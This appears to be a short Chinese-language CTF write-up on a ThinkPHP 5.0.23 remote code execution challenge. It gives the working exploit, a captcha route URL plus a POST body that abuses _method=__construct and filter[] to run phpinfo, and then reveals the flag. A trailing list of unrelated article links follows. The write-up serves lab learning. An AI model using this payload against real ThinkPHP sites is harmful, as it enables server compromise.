当前位置: 首页 > article >正文

[ThinkPHP]5.0.23-Rce 1

[ThinkPHP]5.0.23-Rce 1

根据题目知道这是一个5.0.23的PHP RCE,话不多说直接上扫描器

image-20241105074629529

检测出Payload

url地址:
?s=captcha&test=-1 

Post表单参数: 
_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1

HackBar构造payload,访问成功执行到phpinfo页面

image-20241105075013554

ctrf+f 成功找到flag

image-20241105075051782

flag{9bf3ef01-5e80-42a0-b544-9808a1fd3bb2}


http://www.kler.cn/a/445841.html

相关文章:

  • Windows安全中心(病毒和威胁防护)的注册
  • 基于Springboot人口老龄化社区服务与管理平台【附源码】
  • C05S07-Tomcat服务架设
  • C语言经典100例
  • neo4j 图表数据导入到 TuGraph
  • git stash 的文件如何找回
  • Oracle/MySQL 到 OceanBase 数据库迁移的关键问题与解决方案
  • python学opencv|读取图像(十五)BGR图像和HSV图像通道合并
  • M3D: 基于多模态大模型的新型3D医学影像分析框架,将3D医学图像分析从“看图片“提升到“理解空间“的层次,支持检索、报告生成、问答、定位和分割等8类任务
  • 【蓝桥杯每日一题】扫雷——暴力搜索
  • 方正畅享全媒体采编系统reportCenter.do接口SQL注入漏洞复现 [附POC]
  • css底部对齐布局
  • PC寄存器(Program Counter Register) jvm
  • 探索 Python编程 调试案例:计算小程序中修复偶数的bug
  • 构建一个rust生产应用读书笔记7-确认邮件1
  • 使用screw来对比数据库表和字段差异
  • R语言的数据结构-数据框
  • docker打包镜像并迁移:如何从A服务器打包docker镜像到B服务器上容器中运行
  • 如何利用Python爬虫获得Lazada商品评论列表
  • UE5 跟踪能力的简单小怪
  • 请求go web后端接口 java安卓端播放视频
  • U盘出现USBC乱码文件的全面解析与恢复指南
  • Go 1.24即将到来!
  • [spring]XML配置文件标签
  • 通过smem 定时检测系统内存占用情况
  • windows下搭建本地sofa-registry